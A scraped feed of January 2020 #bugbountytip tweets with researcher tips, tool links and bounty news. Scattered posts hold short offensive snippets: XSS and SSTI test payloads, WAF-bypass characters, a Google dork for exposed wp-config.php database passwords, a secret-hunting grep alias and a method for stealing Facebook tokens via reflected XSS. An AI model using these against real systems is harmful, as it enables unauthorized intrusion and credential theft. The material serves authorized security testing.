โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-20 14:02:48
0 Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/8hvsLmZL9C
Dr.FarFar ๐Ÿ‡ช๐Ÿ‡ฌโฉโฆ๐Ÿ‡จ๐Ÿ‡ฆ
@3XS0


2020-01-19 22:00:04
0 I wrote a small guide with some common techniques to bypass WAF, focus on SQL injection.. https://t.co/MjI0yCtJ7Vย  #bugbountytips #bugbountytip
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-01-19 20:43:51
4 -Sample penetration testing report: https://t.co/crnmtmack8 -Tips on writing a penetration testing report:: https://t.co/BRfhyllyLe -Technical penetration report sample:: https://t.co/3XGsBppDN4 -Nessus sample reports: https://t.co/xaKxlGxtkj #bugbountytip #Hacking #PenTest
Hussein Daher
@HusseiN98D


2020-01-19 20:18:45
5 I must say sorry to all my #bugbounty and #infosec followers for being off for the past month. But no worries, I'll come back with exciting news soon. I'll be hiring too! Stay tunned for a #bugbountytip tomorrow ๐ŸŽ‰
inc0gbyt3
@incogbyte


2020-01-19 20:06:29
1 I wrote a small guide with some common techniques to bypass WAF, focus on SQL injection.. https://t.co/uM6v58Ufzt #bugbountytips #bugbountytip
Vishnu Vardhan Gadupudi
@vishu10x00


2020-01-19 19:51:19
0 One liner to get root domains, by @nahamsec #bugbountytip cat hosts | rev | cut -d "." -f 1,2,3 | rev | sort -u
Anshuman Pattnaik
@anspattnaik


2020-01-19 03:12:24
0 #BugBounty #bugbountytip Found many open ports for a target port 22 - ssh (required password) port 21 - FTP (required password) port 445 - SMTP (required password) port 53 - domain (Possible Dos attack) port 8443 - Admin login page (required password) Should I report it?
Kyle
@B3nac


2020-01-19 02:52:16
0 If the default login request is POST check in Burp if GET is allowed and append the post attributes. For example. https://example . com/login?&username=TotallySecure&password=hunter2 If there is no CSRF token $. #bugbountytip
myo ko
@nutronex


2020-01-19 02:41:59
0 #bugbountytips #bugbountytip tagged as duplicate after 2 weeks :) https://t.co/5aOJw8BEjE
thehackerlab.io
@the_hacker_lab


2020-01-19 00:03:03
2 Rewrote my recon bot to output to markdown and upload to a git server and I love it, next step is to make it a docker container so I can swarm all the wildcards #BugBounty #hackerone #bugcrowd #bugbountytip Only a few of the steps are shown here but add it to your workflow
thehackerlab.io
@the_hacker_lab


2020-01-18 23:45:21
0 Over 50 Domains with XSS found this week on an old AF public program.. then triaged by hackerone.. it was raining alert(https://t.co/7GXCCGXJgp) #bugbountytip Just keep looking....... the bugs are out there !
bugbountytip
@a_l_e_r_t_1_


2020-01-18 18:12:20
1 GET /xyz 404 NOT FOUND GET /xyz/abc 200 OK GET /xyz 403 FORBIDDEN GET /xyz/abc 200 OK Look everywhere !!! #bugbountytips #bugbountytip
bug bounty tips - Retweet
@BugbountytipsR


2020-01-18 16:45:48
0 Site: If a post get 1000+ report abuse then site will automatically delete post. h1_squirtle: Clicking the "Report Abuse Button" 1000 TIme. ============= BOOM Post Deleted ============= $$ 300 $$ Profile: h1/h1_squirtle https://t.co/lWhHQIrwEC #bugbountytips #bugbountytip
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@y0dhha


2020-01-18 12:45:49
0 Task: Find flag, and send your flag to me Hint: It looks like binary but it's not that Don't share your flag Flag Type - NULLCROWD*{} I'll post a solution when the challenge is closed Attachment: https://t.co/x0VIjoGjFT Password - nullcrowd* #bugbountytips #bugbountytip #ctf https://t.co/SXe1drnzLP
dark_warlord14
@dark_warlord14


2020-01-18 08:18:29
0 Guide on how to proxy https traffic from emulator via burpsuite. It works. https://t.co/su35MeoCU4 #bugbountytip
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@y0dhha


2020-01-18 06:22:31
0 Hakrawler - Simple, Fast Web Crawler Designed For Easy, Quick Discovery Of Endpoints And Assets Within A Web Application https://t.co/WQ22tfAnmm #bugbounty #bugbountytips #bugbountytip #bugbounty2020goals
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@y0dhha


2020-01-18 06:21:28
0 1) Cable Haunt Vulnerability Haunts Cable Modems Using Broadcom Chips https://t.co/TTH8SCVSqa 2) Testing for XSS (Like a KNOXSS) https://t.co/kvdt9AjTKQ 3) Hacking Java Deserialization https://t.co/MnvJmuTvaJ #bugbounty #bugbountytip #bugbounty2020goals
Jason
@zeroauth


2020-01-18 02:44:11
0 Want to hear a Bounty Hunter fail? my ImageTragick test payloads this entire time had a typo of my callback address, so this entire time testing image uploads were worthless, and I never documented where they were... #bugbountytip #bugbountytips
healthyoutlet
@healthyoutlet


2020-01-17 22:42:44
0 Click-to-copy feature for an API key? Check for x-frame-options / frame-ancestors. If you can frame the page you can clickjack the key with just a click and a ctrl-v. #BugBountyTip
thehackerish
@thehackerish


2020-01-17 18:00:06
1 #bugbountytip: If you are struggling to run #hashcat on your host, uou may want to run it in #docker instead. I've had success with it, cracking 6 passwords in an assignment. https://t.co/S81qOwyOWs
Dr.FarFar ๐Ÿ‡ช๐Ÿ‡ฌโฉโฆ๐Ÿ‡จ๐Ÿ‡ฆ
@3XS0


2020-01-17 17:17:15
0 #bugbounty #bugbountytip #hacking New platform for bug hunting ...join fast !!!! https://t.co/1zOHSPhURnย โ€ฆ
Karna
@karna__1


2020-01-17 17:06:08
0 #BugBountyTip #bugbountytips #infosec Yep. A huge difference indeed! When you feel all down and exhausted and messed up, just go get some sleep! Chances are you'll wake up the next day with a different kind of energy :) Take rest and get merry @ArchAngelDDay <3 https://t.co/HKXAMiM37m
B.S aymen
@depression0x01


2020-01-17 11:02:02
0 Anyone here is using RSS feeds ? and which channels are u following for being aware about new CVE's I can't find nist cve channel ? #Security #BugBounty #bugbountytips #BugBountyTip #RSS_FOR_ALL #CVE
Sayaan Alam
@ehsayaan


2020-01-17 08:02:07
0 Just Submitted a Critical Subdomain Takeover to Account Takeover Vulnerability.... Hope For the Best!!! #Hacked #bugbounty #BugBountyTip
Dr.FarFar ๐Ÿ‡ช๐Ÿ‡ฌโฉโฆ๐Ÿ‡จ๐Ÿ‡ฆ
@3XS0


2020-01-17 06:34:36
0 #BurpSuite #bugbountytip #bugbountytips Burpsuite extension: phpStudy Backdoor Remote Code Execution Scanner https://t.co/ZBC76PiwTP
Paulos Yibelo
@PaulosYibelo


2020-01-17 05:26:30
2 This is one common way for me to find high severity auth bypass vulnerabilities in high profile targets. Example: https://t.co/9GffzeEp0m #bugbounty #bugbountytip https://t.co/mrgnQhnue5
Dr.FarFar ๐Ÿ‡ช๐Ÿ‡ฌโฉโฆ๐Ÿ‡จ๐Ÿ‡ฆ
@3XS0


2020-01-17 01:20:06
2 Just spent about an hour to bypass an odd filter for a content spoofing/HTML injection flaw in automated emails. Had to 1) Avoid using spaces (see use of / in image), 2) Perform parameter pollution on the "username" field to have multiple HTML elements. #bugbounty #bugbountytip https://t.co/8x01PWjpmW
Dr.FarFar ๐Ÿ‡ช๐Ÿ‡ฌโฉโฆ๐Ÿ‡จ๐Ÿ‡ฆ
@3XS0


2020-01-17 00:50:46
2 Always try to check SSTI Vuln on username params in password reset pages or any mail endpoint, + try fuzzing the same payload in other inputs, cuz may the payload reflect on the body of the mail and not - lemme say for example - in the account details. #bugbountytip #BugBounty
Dr.FarFar ๐Ÿ‡ช๐Ÿ‡ฌโฉโฆ๐Ÿ‡จ๐Ÿ‡ฆ
@3XS0


2020-01-17 00:15:30
2 Using a reflected xss to steal FB Auth tokens If login with facebook is available,use the rxss to show the location hash Put the rxss url in the facebook auth flow [redirect_uri] See the magic view the pic for more #BugBounty #BugBountyTip #bugbountytips mistknly deld the old twt https://t.co/qibBdtN35d
Mrityunjoy
@mitunjoy11


2020-01-16 17:06:55
2 #BugBountyTip When you looking for bugs on a program, always check for programs browser extensions, some times you can got some cool SSRF ;) https://t.co/b1a1zitFjS
siLLyDaDDy
@sillydadddy


2020-01-16 15:50:38
3 #bugbounty #bugbountytip #hacking New platform for bug hunting ...join fast !!!! https://t.co/bqBhpeLOtz
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-01-16 13:34:57
4 Using CeWL to map a website to build a custom wordlist(for password crackers),using words and phrases scraped from the target web pages: cewl -v -d 2 -m 5 -w results http://xx.xx.xx.xx/home/ -d=Depth to spider -v=Verbose output -m=Minimum word length #bugbountytip #Hacking
intigriti
@intigriti


2020-01-16 13:02:13
36 So you believe UUID's are a sufficient protection against IDOR's? Think again! ๐Ÿคฆ Thanks for the #BugBountyTip, @securinti https://t.co/zx5Xn7iDrE
BSides Ahmedabad
@bsidesahmedabad


2020-01-16 09:02:11
4 Closing note of @stokfredrik at #bsidesahmedabad #bugbountytip #bugbounty #infosec https://t.co/eKeJK1PmYf
Ahmed M. Elhady
@Br3akm30ut


2020-01-15 20:04:58
5 Always try to check SSTI Vuln on username params in password reset pages or any mail endpoint, + try fuzzing the same payload in other inputs, cuz may the payload reflect on the body of the mail and not - lemme say for example - in the account details. #bugbountytip #BugBounty
dark_warlord14
@dark_warlord14


2020-01-15 17:08:32
0 inurl:wp-config.php intext:DB_PASSWORD -stackoverflow -wpbeginner -foro -forum -topic -blog -about -docs -articles This google dork is scary as shit. #bugbountytip https://t.co/vWkHcHIMDN
@cr33pb0y
@theyiyibest


2020-01-15 06:56:09
0 Yay, I was awarded a $XXX bounty on @Hacker0x01! First RXSS of the year. Payload: [1].map(alert) https://t.co/7vrkzfnbNA #TogetherWeHitHarder #bugbountytip #wafbypass
Eduard Tolosa
@Edu4rdSHL


2020-01-15 05:54:39
0 @Docker The image size is just 41MB! Special mention to @Spaceprogrammer for the idea and initial dockerfile! #bugbounty #bugbountytips #bugbountytip #osint #recon #tools
Dr.FarFar ๐Ÿ‡ช๐Ÿ‡ฌโฉโฆ๐Ÿ‡จ๐Ÿ‡ฆ
@3XS0


2020-01-14 23:52:49
0 #BurpSuite #bugbountytip #bugbountytips Burpsuite extension: phpStudy Backdoor Remote Code Execution Scanner https://t.co/FzqCz83DY3
bugbountytip
@a_l_e_r_t_1_


2020-01-14 22:05:09
0 Can I bypass it ? Any suggestions ? ( \ ) #bugbountytips #bugbountytip https://t.co/WshiSHcmrM
๏ฃฟHasan
@hasan_zmzm


2020-01-14 20:20:14
0 Simple #1 rule. #BugBountyTip https://t.co/rUq3znRuov
Nick || hunt4p1zza
@ngkogkos


2020-01-14 19:08:56
3 Just spent about an hour to bypass an odd filter for a content spoofing/HTML injection flaw in automated emails. Had to 1) Avoid using spaces (see use of / in image), 2) Perform parameter pollution on the "username" field to have multiple HTML elements. #bugbounty #bugbountytip https://t.co/5KxNTLvx4l
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-14 17:50:39
2 Defenders think in lists. Attackers think in graphs. As long as this is true, attackers win. #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #CyberSecurityTraining #devsecops #cybersecurity #training #ceh #eccouncil #certification #hackerone
Zero Xyele
@zeroxyele


2020-01-14 17:50:29
0 Get intelligence alerts from your targets using by https://t.co/ceSFlbIYul! (@_IntelligenceX) #hackerone #hacker101 #bugbounty #bugbountytip #bugbountytips #bugcrowd #intelligence https://t.co/rj4FQavyU0
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-14 17:34:50
1 Active Directory Visualization for Blue Teams and Threat Hunters https://t.co/exGykctRyY Follow #Hackdoor -๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ Facebook - https://t.co/iNczOcGmCt LinkedIn - https://t.co/QyDs7BhC3g Instagram - https://t.co/Q0OxMhKeYV Youtube - https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip
AkaaZaan
@AkaaZaan


2020-01-14 16:28:30
0 I am giving out $300 to the one who shares a working tip on bypassing Authorization bearer header. #Bugbountytip
robre
@_robre


2020-01-14 15:01:25
0 Create a list of interesting keywords for grep: $ echo โ€žpassword\ntoken\nsecret\nusernameโ€œ>~/dict/words.txt $ alias secgrep=โ€šgrep -f ~/dict/words.txtโ€˜ $ secgrep -r somedir/ somedir/file.php: dbpassword: hunter2 #BugBountyTip #bugbountytips #hacking @TomNomNom
reconness
@reconness


2020-01-14 14:01:58
1 Working on screenshot Agents feature #bugbountytips #BugBountyTip #bugbounty2020goals
Mashoud1122
@mashoud1122


2020-01-14 10:21:07
2 Using a reflected xss to steal FB Auth tokens If login with facebook is available,use the rxss to show the location hash Put the rxss url in the facebook auth flow [redirect_uri] See the magic view the pic for more #BugBounty #BugBountyTip #bugbountytips mistknly deld the old twt https://t.co/NIuW4ennqY
Imran Parray
@CreedHackers


2020-01-14 09:57:31
0 @tirtha_mandal @synack @SynackRedTeam Since you have added #BugBountyTip as a hastag in your tweet i would like to know how this tweet a bug bounty tip.
Israel Thomas
@IsraelThomas_7


2020-01-14 09:05:29
0 I jus love SSL misconfigurations! :) #BugBountyTip
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-14 07:04:51
0 https://t.co/AQ1isKOUi5 Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt LinkedIn - https://t.co/QyDs7BhC3g Instagram - https://t.co/Q0OxMhKeYV Youtube - https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #pentesting #CyberSecurityTraining #cybersecurity
Mourad
@SecuAudit


2020-01-14 04:03:59
0 i need someone who speak Vietnamese . #bugbounty #BugBountyTip
Mashoud1122
@mashoud1122


2020-01-14 01:22:50
1 Using A Reflected XSS to steal FB Auth Tokens[increase impact] if login with facebook is available use the rxss to reflect the location hash. Put the rxss url in the facebook auth flow[ redirect_uri ]. See the magic view the pic for more #BugBountyTip #BugBountyTips #BugBountyTip https://t.co/xKExO8OAcp
Dr.FarFar ๐Ÿ‡ช๐Ÿ‡ฌโฉโฆ๐Ÿ‡จ๐Ÿ‡ฆ
@3XS0


2020-01-14 00:58:52
0 Here is another write up for 2fa bypass. https://t.co/CDff0sKP0Uย โ€ฆ #hacking #bugbountytip #infosec #writeup
dark_warlord14
@dark_warlord14


2020-01-13 18:57:01
0 Hacked up alias for ffuf to store all search results so you can look at them later. #bugbountytips #bugbountytip https://t.co/uDTJUGMTj1
Nick || hunt4p1zza
@ngkogkos


2020-01-13 17:58:38
0 If a subdomain returns a default/under construction or dead page, it may still be worth to run it through @hacker_'s getallurl + @TomNomNom's concurl tools to request all URLs & identify any URLs with different response. See image for commands. #BugBounty #bugbountytip https://t.co/YNXB7uamRY
Numan ร–ZDEMฤฐR
@numanozdemircom


2020-01-13 17:57:25
0 Who wanna find Critical (P1) vulnerabilities just in 10 seconds? An easy bounty tip for you. [PHP] Exposing DB Credentials / HttpOnly Bypass / Full Path Disclosure https://t.co/t08E7xzvG5 #BugBounty #bugbountytips #bugbountytip
Ebrahim Hegazy
@Zigoo0


2020-01-13 13:11:57
11 #BugBountyTip When using #Nmap as part of your #Recon arsenal, make sure to add --data-length=50 {or any number in 20~60, the TCP packet header size). Otherwise, Nmap will in many cases return False Positives (i.e. too many open ports, or ports that are not actually open). #TBC
Yadhavi
@PrincessYadhavi


2020-01-13 12:44:10
0 Can I report Exposed google map api key on @Bugcrowd platform program? Is it valid bug? #bugbounty #bugbountytip #bugbountytips
Arif Khan
@payloadartist


2020-01-13 11:56:33
1 I m surprised at how often companies use these credentials in internal login panels: company_name company_name admin company_name employee_name (/github username/from LinkedIn/any public source) company_name #bugbounty #bugbountytip #infosec
Tirtha Mandal
@tirtha_mandal


2020-01-13 09:45:30
1 Thursday's full night hunting finally paid off by @synack. Good start of 2020. Thank you @synack @SynackRedTeam #xss #bugbounty #synack #srt #bugbountytips #bugbountytip #bugbounty2020goals https://t.co/WQWiJCtNPD
OWASP Web Security Testing Guide
@owasp_wstg


2020-01-13 09:22:00
0 When mapping an application, pay special attention to all HTTP requests (i.e. GET and POST), as well as every parameter and form field that is passed to the application. #BugBountyTip #CyberSecurity #infosec https://t.co/D9QWw9BxWm
Lokesh Sonagra
@Anonx_pro


2020-01-13 01:51:02
2 Top Bug Bounty Tools 1. Burp Suit 2. Vulnerability Lab 3. Google Dorks 4. DNS Discovery 5. WAPITI 6. INalyzeR #hackerone #hackers #hack #bugbounty #bugcrowd #python #sqlinjection #programmers #hacks #bugbountytip #ruby #indianhackers #ssrf #developers #bughunters #xxe #hacker
Jason
@zeroauth


2020-01-13 00:35:15
0 Just made a small blog post detailing how I used Frida to bypass SSL cert pinning on a custom cert pinning integration. App developer made their own function instead of using the X509TrustManager. https://t.co/OfYS6ofaBP #bugbountytip #bugbountytips
QSoloX
@QSoloX


2020-01-12 18:27:05
0 How common do you guys find http parameter pollution exploits? Just wacthed a video from @PwnFunction and was very intrigued about it. Its one of those things that even just a month ago i would have never though to be possible. #bugbountytip #bugbounty #hacking
Petko D. Petkov
@pdp


2020-01-12 17:48:04
0 Access to the right tools makes a huge difference when doing pentests and bug bounty hunting. How do you know which tool is good/right? Here is the deal. Good tools ultimately save you time - loads of time. #bugbountytip
bug bounty tips - Retweet
@BugbountytipsR


2020-01-12 13:28:27
0 OLD IS GOLD for @bobby6102000 HACKED NORD VPN OLD WD VERSION $$$$$$$$$$$$$$$$$ BOUNTY $500 $$$$$$$$$$$$$$$$$ READ HERE https://t.co/jSxpimqExU #bugbountytips #bugbountytip BTW BOBBY BRUH #IndiaRejectsCAA_NRC_NPR
Pratik Dabhi
@impratikdabhi


2020-01-12 13:18:08
1 Payload for test XSS , SQLI , SSTI vulnerabilities. '"><svg/onload=alert()>{{7*7}} #Payload #XSS #SQLI #SSTI #BugBountyTip
WebSecurityIT
@WebSecurityIT


2020-01-12 12:00:00
0 RT @LooseSecurity: Some useful characters for bypassing WAF(URL-Encoded): %0a%0d %09 %00 %e2%80%ae #bugbountytips #bugbountytip #bugbountโ€ฆ
WebSecurityIT
@WebSecurityIT


2020-01-12 09:30:00
1 RT @godzilla74: Anyone know how long @Akamai typically blocks an IP? Can I file an appeal or something? #infosec #bugbountytip #bugbounty
d0nut
@d0nutptr


2020-01-12 08:44:07
2 If example[.]com points to IP 1.2.3.4 and redirect to www[.]example[.]com but www[.]example[.]com doesn't point to anything (No A, AAAA, CNAME), try submitting your HTTP request to http://1.2.3.4/ with a "HOST: www[.]example[.]com" header. #bugbountytip #bugbountytips
WebSecurityIT
@WebSecurityIT


2020-01-11 20:00:00
0 RT @LooseSecurity: Some useful characters for bypassing WAF(URL-Encoded): %0a%0d %09 %00 %e2%80%ae #bugbountytips #bugbountytip #bugbountโ€ฆ
Rafael Cintra
@RafaelCintraSec


2020-01-11 17:24:37
0 shx_webgame - Resolvendo CTF - Shellter Labs https://t.co/H5AZAr9OaR #hacking #ctf #bugbountytip
Katie Paxton-Fear
@InsiderPhD


2020-01-11 17:00:01
11 New video incoming! ๐Ÿšจ In this video, we talk APIs. What they are, where to find them, and most importantly how to test them for bugs! We cover: API recon, the most common API bugs and teach you how to find them #bugbountytip #BugBounty #CyberSecurity https://t.co/3hDwOizxwl https://t.co/kPHof1JHtp
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@y0dhha


2020-01-11 14:52:41
0 Awesome Hacking Tool Lists https://t.co/LauqqrTZ82 #bugbounty #bugbountytips #bugbountytip #android #webpentest #Malware #penteset
Fisher
@Regala_


2020-01-11 14:06:44
2 Tip that has been shared a thousand times but to reiterate: always make a video POC in your reports. It takes 2 minutes and you're covering your future self in case things get fixed, environment change, shit lits on fire. #bugbountytip
Vishnu Vardhan Gadupudi
@vishu10x00


2020-01-11 03:29:38
1 One line to extract urls from a folder #bugbountytip grep -oriahE "https?://[^\"\\'> ]+" *
Abhishek ๐Ÿ•ต๏ธ
@abhishake100


2020-01-10 17:55:32
2 I just published "My First RCE (Stressed Employee gets me 2x bounty ๐Ÿค‘)" #bugbounty #bug #bounty #bugbountytip https://t.co/11GF7bsr8J
Sourav Sahana
@kernel_rider


2020-01-10 15:34:51
0 Here is another write up for 2fa bypass. https://t.co/ORu7ZWvJjP #hacking #bugbountytip #infosec #writeup
Justin Farmer
@godzilla74


2020-01-10 15:14:02
0 Anyone know how long @Akamai typically blocks an IP? Can I file an appeal or something? #infosec #bugbountytip #bugbounty
OWASP Web Security Testing Guide
@owasp_wstg


2020-01-10 09:22:02
4 When doing search engine reconnaissance, do not limit testing to just one search engine provider, as different search engines may generate different results. ๐Ÿง‘โ€๐Ÿคโ€๐Ÿง‘๐Ÿ‘ฏ #pentesting #CyberSecurity #infosec #OSINT #BugBountyTip https://t.co/z3TAwSxZnB https://t.co/SD8uQVh5XC
Digital Business News
@DASummerCamp


2020-01-10 05:15:00
0 In this week's blog, iBaibhavJha writes about how he found found a Privilege Escalation Bug in a private Ecommerce. #informationsecurity #cybersecurity #blogger #infosecmatters #writeups #ecommerce #bugbountytip https://t.co/SJLKTZSdRs
Nassec.io
@nassecio


2020-01-10 04:47:33
2 In this week's blog, @iBaibhavJha writes about how he found found a Privilege Escalation Bug in a private Ecommerce. #informationsecurity #cybersecurity #blogger #infosecmatters #writeups #ecommerce #bugbountytip https://t.co/tYuY4jldiV
Dr.FarFar ๐Ÿ‡ช๐Ÿ‡ฌโฉโฆ๐Ÿ‡จ๐Ÿ‡ฆ
@3XS0


2020-01-10 02:19:15
1 #BurpSuite #bugbountytip #bugbountytips Burpsuite extension: phpStudy Backdoor Remote Code Execution Scanner https://t.co/zUtp0QmdQK
Dr.FarFar ๐Ÿ‡ช๐Ÿ‡ฌโฉโฆ๐Ÿ‡จ๐Ÿ‡ฆ
@3XS0


2020-01-10 00:54:18
0 #BurpSuite #bugbountytip #bugbountytips Burpsuite extension: phpStudy Backdoor Remote Code Execution Scanner https://t.co/0GODNlKoK3
Daher Mohamed
@DaherMohamed4


2020-01-09 17:25:00
0 Approx 5k$ bounties for multiple Admin Blind XSS Injection. Thanks @IAmMandatory @Bugcrowd #bugbountytip #bugbountytips Used xsshunter tool for blind xss(s) https://t.co/3vBS224SI2
Renwa
@RenwaX23


2020-01-09 15:22:02
0 OnePlus Bug Bounty Program is Scam #bugbountytip
Oghenejivwe ๐Ÿ‡ณ๐Ÿ‡ฌ๐Ÿ—ฏ
@realOghenejivwe


2020-01-09 14:35:34
0 There are very few things on earth more frustrating than spending hourssssssss, looking for bugs and finding none..Worse still in a CTF program! ๐Ÿ˜๐Ÿ˜‘ #bugbounty #bugbountytip #bugbounty2020goals
LivEdOverflow ๐Ÿ”ด๐Ÿธ
@LivEdOverflow


2020-01-09 13:35:27
1 This also works for other embedded services (vimeo, dailymotion, twitter, facebook...)! Thanks for the #BugBountyTip, @ฬถLฬถiฬถvฬถeฬถOฬถvฬถeฬถrฬถfฬถlฬถoฬถwฬถ @EdOverflow!https://t.co/IoLsH8w4aQ https://t.co/aK4FU9iZ6z
intigriti
@intigriti


2020-01-09 13:05:16
13 This also works for other embedded services (vimeo, dailymotion, twitter, facebook...)! Thanks for the #BugBountyTip, @ฬถLฬถiฬถvฬถeฬถOฬถvฬถeฬถrฬถfฬถlฬถoฬถwฬถ @EdOverflow! https://t.co/bAE0snqYcZ
Rafin Rahman Chy
@rafinrahmanchy


2020-01-09 12:48:21
0 @intigriti It's not a #bugbountytip ๐Ÿ˜’
Larouanne Tristan
@Tr4LSecurity


2020-01-09 12:10:14
0 Following the release of the MavenDecoder, here is an article on how to use #maven repository, secure them, and unsecure them: https://t.co/etGTIW5Div #pentest #bugbountytip
Rushiikesh
@u1tran00b


2020-01-09 08:47:01
0 Thank you so much for the awesome swag @Bugcrowd.... Waiting for the P1 Warrior Level 3 swag pack now...๐Ÿ˜๐Ÿ˜....Thanks for being a great platform.... If you are a newbie start your journey with #Bugcrowd #bugbounty #bugbountytips #bugbountytip โค๏ธโค๏ธ https://t.co/ndXSnTmFpN
Mufeed VH
@mufeedvh


2020-01-08 15:46:26
9 Hey all, I started a youtube channel on bug bounties, programming, and security. This is my first video, an intro about me and the channel. I hope you guys are into memes and stuff. :) https://t.co/U99UY5w2cR #bugbounty #bugbountytip #infosec
STร–K
@stokfredrik


2020-01-08 15:28:44
30 Bug Bounty hunters & Pentesters alike, they all love to run their own domain and DNS Servers to log Out of Band interactions caused by RCEs, XXE's SSRFs and blind requests. And now you can do that too! Better safe than sorry! https://t.co/BgEpHIzjZr #bugbountytip #infosec #howto https://t.co/W5DyPENH5z
Aman Mahendra
@amanmahendra_


2020-01-08 10:44:39
0 Thanks @Hacker0x01 for this amazing hoodie ๐Ÿ˜๐Ÿ”ฅ #bugbountytip #togetherwehitharder https://t.co/pU6HqPMPC9
Ammar Amer
@cry__pto


2020-01-08 10:06:05
6 #BugBounty tools part (5): HTTPScreenShot:https://t.co/qIuJA1SuJW SubBrute:https://t.co/5i2SI5Dzn7 OnlineHashCrack:https://t.co/zkqBbBh4un Wfuzz:https://t.co/qCK5ghmU5H LinkFinder:https://t.co/k015xUNhCm aquatone:https://t.co/6oxb7sgOhJ #bugbountytip
Christian Folini
@ChrFolini


2020-01-08 09:25:13
0 Working on my first blog post of the year: fingerprinting the #OWASP ModSecurity @CoreRuleSet This is surprisingly difficult, but I do not like security by obscurity, so here we go! #WAF #CRS3 #BugBountyTip
m0z
@LooseSecurity


2020-01-08 01:06:16
6 Some useful characters for bypassing WAF(URL-Encoded): %0a%0d %09 %00 %e2%80%ae #bugbountytips #bugbountytip #bugbounty #infosec #CyberSecurity
Tragger Osbourne๐Ÿง
@OsbourneTragger


2020-01-07 17:40:48
0 I am Reversing Engineering the program I made few years ago and trying to Developer some Exploits , I hope ๐Ÿคž, I will found some #zeroday #bugbountytips #bugbounty2020goals #skills #BugBounty #bugbountytip #Exploit #Pentesting #infosec #togetherwehitharder https://t.co/NtQPLB8oZt
Tragger โšก๏ธโ˜„๏ธ
@NyataraOsborne


2020-01-07 17:35:05
0 I am Reversing Engineering the program I made few years ago and trying to Developer some Exploits , I hope ๐Ÿคž, I will found some #zeroday #bugbountytips #bugbounty2020goals #skills #BugBounty #bugbountytip #Exploit #Pentesting #infosec #togetherwehitharder https://t.co/waG51ZWIUX
Arif Khan
@payloadartist


2020-01-07 16:38:14
0 Excellent article by @streaak on his recon methodology #bugbounty #bugbountytip https://t.co/UqLBT5AJ3r
AkaaZaan
@AkaaZaan


2020-01-07 16:31:07
0 I want file upload payloads. Anyone guide me to some repository? #bugbountytip
Cryptographer
@crypt0gr4ph3r


2020-01-07 14:55:43
0 #bugbountytip I don't know how and why, I changed the expired token value from xxxxb to xxxxB, and it works ๐Ÿคฃ #hackerone #bugcrowd #bugbounty #hacker101
Sanketh Sharath
@sharathsanketh


2020-01-07 13:20:48
2 The need for making notes and having an organized methodology in bug bounty hunting https://t.co/kgFctJB2PV #bugbounty #bugbountytips #bugbountytip #webhacking
Yassine Aboukir ๐Ÿ
@Yassineaboukir


2020-01-07 10:21:11
2 I like decompiling older versions of android mobile apps to find deprecated API legacy endpoints as well as hardcoded creds which are surprisingly valid most often. You may use this mirror website for that purpose https://t.co/coCgEd89ly #bugbountytip
Dewanand Vishal
@dewcode91


2020-01-07 05:29:34
0 People who don't know how to approach a target app in bug bounty. Please Read Web Application Hackers Handbook- Chapter4. #intigriti #bugbountytip
GokhanGK
@gkhck_


2020-01-06 20:34:59
2 My first bug bounty writeup. It was a bit inexperienced but I wanted to share :) #bugbountytips #bugbountytip #infosec https://t.co/JGLTMr4BMK
Ammar Amer
@cry__pto


2020-01-06 16:22:32
5 Practice part (3): https://t.co/WPU9fCoxTd https://t.co/ZwkDd9pnFd https://t.co/XUfNhHJFmk https://t.co/XrESMMzbPD https://t.co/e61c34U8tC https://t.co/vLZjeXTwtQ https://t.co/XHVhlnzJjb https://t.co/7okAXhgpZt #bugbountytip #Hacking #PenTest
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-06 13:42:55
0 Every Hacker Will Agree ! ๐Ÿ“ฒ๐Ÿ†๐Ÿ’ฐ Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/gesA7tYLqX
dark_warlord14
@dark_warlord14


2020-01-06 11:23:43
0 What can you do with ffuf? 1. Directory bruteforcing 2. Parameter discovery 3. Vhost bruteforcing 4. Parse waybackurls data filtered by status code, response length It's extremely fast. With 200 threads on 1gb ram VPS, I can get 1000 requests per second easily. #bugbountytip
Dan Cimpean
@DanCimpean


2020-01-05 23:11:44
0 GitHub - nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters: A list of resources for those interested in getting started in bug bounties #bugbountytip #bugbounty #infosec https://t.co/ojMfeteDaT
Khaled Mohamed
@xelkomy


2020-01-05 22:06:43
2 Tool #XSpear is very great. @hahwul thanks very much for this a tool๐Ÿ˜…๐Ÿ˜ #bugbountytips #bugbountytip #infosec #xelkomy
Shaked Klein Orbach ๐Ÿ‡ฎ๐Ÿ‡ฑ
@shakedko


